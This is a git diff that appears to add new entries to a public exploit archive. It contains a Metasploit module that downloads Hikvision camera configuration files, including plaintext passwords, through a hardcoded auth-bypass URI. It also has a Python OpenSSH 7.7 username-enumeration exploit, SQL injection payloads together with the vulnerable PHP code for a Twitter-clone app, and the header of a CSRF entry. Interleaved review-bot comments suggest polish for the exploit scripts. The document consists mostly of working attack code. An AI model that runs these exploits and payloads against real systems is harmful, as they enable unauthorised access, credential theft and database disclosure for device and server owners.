diff --git a/exploits/hardware/webapps/45231.rb b/exploits/hardware/webapps/45231.rb
new file mode 100755
index 000000000..a8e43ec7f
--- /dev/null
+++ b/exploits/hardware/webapps/45231.rb
@@ -0,0 +1,77 @@
+# Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
+# Author: Alfie
+# Date: 2018-08-21
+# Website: https://www.hikvision.com/en/
+# Software: Hikvision Camera
+# Versions:
+# DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+# DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+# DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+# DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+# DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+# DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+# DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Configuration download in Hikvision IP Cameras',
+ 'Description' => %q{
+ Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing. In addition to gaining full administrative access, the vulnerability can be used to retrieve plain-text passwords for all configured users.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Monte Crypto', # Vulnerability discovery
+ 'Alfie Njeru' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html' ],
+
+ [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'Path to the path that config is stored ', '/System/configurationFile?auth=YWRtaW46MTEK'])
+ ])
+ end
+
+ def run_host(ip)
+
+ print_status("#{rhost}:#{rport} - Sending request...")
+ uri = normalize_uri(target_uri.path)
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET',
+ })
+
+ if res and res.code == 200
+ contents = res.body
+ fname = File.basename(datastore['TARGETURI'])
+ path = store_loot(
+ 'usersvision ',
+ 'text/plain',
+ ip,
+ contents,
+ fname
+ )
+ print_status("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ print_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/45233.py b/exploits/linux/remote/45233.py
new file mode 100755
index 000000000..3c705883c
--- /dev/null
+++ b/exploits/linux/remote/45233.py
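Review bot: The loot type passed to `store_loot` in `run_host`, `'usersvision '`, carries a trailing space, and `fname = File.basename(datastore['TARGETURI'])` keeps the whole `?auth=...` query string in the stored filename, so the saved file is named after the request URI rather than the configuration file; a fixed type and name, e.g. `'hikvision.config'` and `'configurationFile'`, would be easier to index in a report (whether `store_loot` sanitises the `?` is not visible here). The header comment calls the module "User Enumeration" while `'Name'` says "Configuration download", and the `TARGETURI` description `'Path to the path that config is stored '` reads awkwardly — `'Path to the configuration file'` would do. `'References'` lists two write-ups but no vulnerability identifier, which makes correlating findings with vulnerability-management data harder. A successful retrieval is reported with `print_status`; `print_good` is the conventional call for a positive result, and the `return` at the end of the `else` branch does nothing.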
@@ -0,0 +1,165 @@
+# Exploit: OpenSSH 7.7 - Username Enumeration
+# Author: Justin Gardner
+# Date: 2018-08-20
+# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
+# Affected Versions: OpenSSH version < 7.7
+# CVE: CVE-2018-15473
+
+###########################################################################
+# ____ _____ _____ _ _ #
+# / __ \ / ____/ ____| | | | #
+# | | | |_ __ ___ _ __ | (___| (___ | |__| | #
+# | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | #
+# | |__| | |_) | __/ | | |____) |___) | | | | #
+# \____/| .__/ \___|_| |_|_____/_____/|_| |_| #
+# | | Username Enumeration #
+# |_| #
+# #
+###########################################################################
+
+#!/usr/bin/env python
+
+import argparse
+import logging
+import paramiko
+import multiprocessing
+import socket
+import sys
+import json
+# store function we will overwrite to malform the packet
+old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+
+# create custom exception
+class BadUsername(Exception):
+ def __init__(self):
+ pass
+
+# create malicious "add_boolean" function to malform packet
+def add_boolean(*args, **kwargs):
+ pass
+
+# create function to call when username was invalid
+def call_error(*args, **kwargs):
+ raise BadUsername()
+
+# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
+def malform_packet(*args, **kwargs):
+ old_add_boolean = paramiko.message.Message.add_boolean
+ paramiko.message.Message.add_boolean = add_boolean
+ result = old_parse_service_accept(*args, **kwargs)
+ #return old add_boolean function so start_client will work again
+ paramiko.message.Message.add_boolean = old_add_boolean
+ return result
+
+# create function to perform authentication with malformed packet and desired username
+def checkUsername(username, tried=0):
+ sock = socket.socket()
+ sock.connect((args.hostname, args.port))
+ # instantiate transport
+ transport = paramiko.transport.Transport(sock)
+ try:
+ transport.start_client()
+ except paramiko.ssh_exception.SSHException:
+ # server was likely flooded, retry up to 3 times
+ transport.close()
+ if tried < 4:
+ tried += 1
+ return checkUsername(username, tried)
+ else:
+ print '[-] Failed to negotiate SSH transport'
+ try:
+ transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
+ except BadUsername:
+ return (username, False)
+ except paramiko.ssh_exception.AuthenticationException:
+ return (username, True)
+ #Successful auth(?)
+ raise Exception("There was an error. Is this the correct version of OpenSSH?")
+
+def exportJSON(results):
+ data = {"Valid":[], "Invalid":[]}
+ for result in results:
+ if result[1] and result[0] not in data['Valid']:
+ data['Valid'].append(result[0])
+ elif not result[1] and result[0] not in data['Invalid']:
+ data['Invalid'].append(result[0])
+ return json.dumps(data)
+
+def exportCSV(results):
+ final = "Username, Valid\n"
+ for result in results:
+ final += result[0]+", "+str(result[1])+"\n"
+ return final
+
+def exportList(results):
+ final = ""
+ for result in results:
+ if result[1]:
+ final+=result[0]+" is a valid user!\n"
+ else:
+ final+=result[0]+" is not a valid user!\n"
+ return final
+
+# assign functions to respective handlers
+paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
+paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
+
+# get rid of paramiko logging
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+arg_parser = argparse.ArgumentParser()
+arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address")
+arg_parser.add_argument('--port', type=int, default=22, help="The target port")
+arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used")
+arg_parser.add_argument('--outputFile', type=str, help="The output file location")
+arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location")
+group = arg_parser.add_mutually_exclusive_group(required=True)
+group.add_argument('--username', type=str, help="The single username to validate")
+group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through")
+args = arg_parser.parse_args()
+
+sock = socket.socket()
+try:
+ sock.connect((args.hostname, args.port))
+ sock.close()
+except socket.error:
+ print '[-] Connecting to host failed. Please check the specified host and port.'
+ sys.exit(1)
+
+if args.username: #single username passed in
+ result = checkUsername(args.username)
+ if result[1]:
+ print result[0]+" is a valid user!"
+ else:
+ print result[0]+" is not a valid user!"
+elif args.userList: #username list passed in
+ try:
+ f = open(args.userList)
+ except IOError:
+ print "[-] File doesn't exist or is unreadable."
+ sys.exit(3)
+ usernames = map(str.strip, f.readlines())
+ f.close()
+ # map usernames to their respective threads
+ pool = multiprocessing.Pool(args.threads)
+ results = pool.map(checkUsername, usernames)
+ try:
+ outputFile = open(args.outputFile, "w")
+ except IOError:
+ print "[-] Cannot write to outputFile."
+ sys.exit(5)
+ if args.outputFormat=='list':
+ outputFile.writelines(exportList(results))
+ print "[+] Results successfully written to " + args.outputFile + " in List form."
+ elif args.outputFormat=='json':
+ outputFile.writelines(exportJSON(results))
+ print "[+] Results successfully written to " + args.outputFile + " in JSON form."
+ elif args.outputFormat=='csv':
+ outputFile.writelines(exportCSV(results))
+ print "[+] Results successfully written to " + args.outputFile + " in CSV form."
+ else:
+ print "".join(results)
+ outputFile.close()
+else: # no usernames passed in
+ print "[-] No usernames provided to check"
+ sys.exit(4)
\ No newline at end of file
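Review bot: The `#!/usr/bin/env python` line sits after the banner comment, on file line 20, so it is not a shebang and the executable bit from `new file mode 100755` buys nothing; it belongs on line 1, and since the file uses Python 2 `print` statements, `#!/usr/bin/env python2` would name the interpreter honestly. The header line `# Affected Versions: OpenSSH version < 7.7` contradicts the title "OpenSSH 7.7" and the linked 7.7 tarball, which is confusing for anyone triaging the CVE; the two should agree. The help text for `--outputFormat` is a copy of `--outputFile`'s (`"The output file location"`) and should describe the `list`/`json`/`csv` choices instead. In the `--userList` branch, `open(args.outputFile, "w")` is reached even when `--outputFile` was not given, and the resulting `TypeError` is not an `IOError`, so it escapes the `except` and crashes after the whole list has been processed; a `--outputFile`-is-`None` check before the pool runs would fail early instead.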
diff --git a/exploits/php/webapps/45230.txt b/exploits/php/webapps/45230.txt
new file mode 100644
index 000000000..dffd34181
--- /dev/null
+++ b/exploits/php/webapps/45230.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
+# Date: 2018-08-21
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# POC : SQLi
+# vulnerable files : follow.php , index.php
+# vulnerable parameters : userid , username
+
+# 1) follow.php :
+
+# Parameters : userid , username
+# Type : Union query
+# Type : Time-based blind
+# Payloads :
+
+userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
+username: ' AND sleep(10)%23
+
+# vulnerable code :
+
+if($_GET['userid'] && $_GET['username']){
+if($_GET['userid']!=$user_id){
+$follow_userid = $_GET['userid'];
+$follow_username = $_GET['username'];
+include 'connect.php';
+$query = mysqli_query($con, "SELECT id
+ FROM following
+WHERE user1_id='$user_id' AND user2_id='$follow_userid'
+");
+
+# 2) index.php :
+
+# vulnerable parameter : username
+# Type : Union query
+# Payload :
+
+' union select 1,2,user(),4,5,6
+
+# vulnerable code :
+
+if($_POST['login-btn']=="login-submit"){
+if($_POST['username'] != "" && $_POST['password'] != ""){
+$username = strtolower($_POST['username']);
+include "connect.php";
+$query = mysqli_query($con, "SELECT id, password
+FROM users
+ WHERE username='$username'");
\ No newline at end of file
diff --git a/exploits/php/webapps/45232.txt b/exploits/php/webapps/45232.txt
new file mode 100644
index 000000000..9e64220f0
--- /dev/null
+++ b/exploits/php/webapps/45232.txt
@@ -0,0 +1,29 @@ +# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post) +# Date: 2018-08-21 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# Description : +# An issue was discovered in Twitter-Clone 1 which allows a remote +# attacker to force any victim to delete posts. + +# POC : +# Delete posts exploit : + + +
+